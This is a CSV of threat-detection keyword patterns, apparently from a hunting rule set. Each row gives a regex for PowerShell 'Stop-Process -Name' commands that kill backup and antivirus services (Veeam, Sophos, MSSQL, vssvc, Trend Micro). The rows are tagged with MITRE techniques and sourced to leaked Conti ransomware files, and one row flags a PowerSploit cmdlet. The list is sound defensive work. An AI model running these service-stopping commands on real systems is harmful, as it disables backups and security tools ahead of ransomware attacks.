"*Stop-Process -Name MSSQL$PRACTICEMGT*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$PRACTICEMGT.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$PRACTTICEBGC*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$PRACTTICEBGC.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$PROD*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$PROD.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$PROFXENGAGEMENT*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$PROFXENGAGEMENT.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$SBSMONITORING*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$SBSMONITORING.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$SHAREPOINT*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$SHAREPOINT.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$SOPHOS*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$SOPHOS.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$SQL_2008*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$SQL_2008.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$SQLEXPRESS*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$SQLEXPRESS.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$SYSTEM_BGC*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$SYSTEM_BGC.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$TPS*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$TPS.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$TPSAMA*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$TPSAMA.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$VEEAMSQL*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$VEEAMSQL.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$VEEAMSQL*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$VEEAMSQL.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name sacsvr*",".{0,1000}Stop\-Process\s\-Name\ssacsvr.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name SAVAdminService*",".{0,1000}Stop\-Process\s\-Name\sSAVAdminService.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name SAVService*",".{0,1000}Stop\-Process\s\-Name\sSAVService.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name shadowprotectsvc*",".{0,1000}Stop\-Process\s\-Name\sshadowprotectsvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name ShMonitor*",".{0,1000}Stop\-Process\s\-Name\sShMonitor.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name Smcinst*",".{0,1000}Stop\-Process\s\-Name\sSmcinst.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name SmcService*",".{0,1000}Stop\-Process\s\-Name\sSmcService.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name sms_site_sql_backup*",".{0,1000}Stop\-Process\s\-Name\ssms_site_sql_backup.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name SntpService*    ",".{0,1000}Stop\-Process\s\-Name\sSntpService.{0,1000}\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name sophossps*",".{0,1000}Stop\-Process\s\-Name\ssophossps.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name spxservice*",".{0,1000}Stop\-Process\s\-Name\sspxservice.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name sqbcoreservice*",".{0,1000}Stop\-Process\s\-Name\ssqbcoreservice.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name SQLAgent$SOPH",".{0,1000}Stop\-Process\s\-Name\sSQLAgent\$SOPH","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name SQLAgent$VEEAMSQL*",".{0,1000}Stop\-Process\s\-Name\sSQLAgent\$VEEAMSQL.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name SQLAgent$VEEAMSQL*",".{0,1000}Stop\-Process\s\-Name\sSQLAgent\$VEEAMSQL.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name stc_endpt_svc*",".{0,1000}Stop\-Process\s\-Name\sstc_endpt_svc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name stop SepMasterService*",".{0,1000}Stop\-Process\s\-Name\sstop\sSepMasterService.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name svcGenericHost*",".{0,1000}Stop\-Process\s\-Name\ssvcGenericHost.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name swi_filter*",".{0,1000}Stop\-Process\s\-Name\sswi_filter.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name swi_service*",".{0,1000}Stop\-Process\s\-Name\sswi_service.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name swi_update*",".{0,1000}Stop\-Process\s\-Name\sswi_update.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name swi_update_64*",".{0,1000}Stop\-Process\s\-Name\sswi_update_64.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name TmCCSF*",".{0,1000}Stop\-Process\s\-Name\sTmCCSF.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name tmlisten*",".{0,1000}Stop\-Process\s\-Name\stmlisten.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name TrueKey*",".{0,1000}Stop\-Process\s\-Name\sTrueKey.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name TrueKeyScheduler*    ",".{0,1000}Stop\-Process\s\-Name\sTrueKeyScheduler.{0,1000}\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name TrueKeyServiceHel",".{0,1000}Stop\-Process\s\-Name\sTrueKeyServiceHel","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name vapiendpoint*       ",".{0,1000}Stop\-Process\s\-Name\svapiendpoint.{0,1000}\s\s\s\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name VeeamBackupSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamBackupSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name VeeamBrokerSvc *",".{0,1000}Stop\-Process\s\-Name\sVeeamBrokerSvc\s.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name VeeamCatalogSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamCatalogSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name VeeamCloudSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamCloudSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name VeeamDeploymentService*",".{0,1000}Stop\-Process\s\-Name\sVeeamDeploymentService.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name VeeamDeploySvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamDeploySvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name VeeamDeploySvc*    ",".{0,1000}Stop\-Process\s\-Name\sVeeamDeploySvc.{0,1000}\s\s\s\s","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name VeeamEnterpriseManagerSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamEnterpriseManagerSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name VeeamHvIntegrationSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamHvIntegrationSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name VeeamMountSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamMountSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name VeeamNFSSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamNFSSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name VeeamRESTSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamRESTSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name VeeamTransportSvc*",".{0,1000}Stop\-Process\s\-Name\sVeeamTransportSvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name vsnapvss*",".{0,1000}Stop\-Process\s\-Name\svsnapvss.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name vssvc*",".{0,1000}Stop\-Process\s\-Name\svssvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name wbengine*",".{0,1000}Stop\-Process\s\-Name\swbengine.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name wbengine*",".{0,1000}Stop\-Process\s\-Name\swbengine.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name WRSVC*",".{0,1000}Stop\-Process\s\-Name\sWRSVC.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Get-NetForestCatalog*",".{0,1000}Get\-NetForestCatalog.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
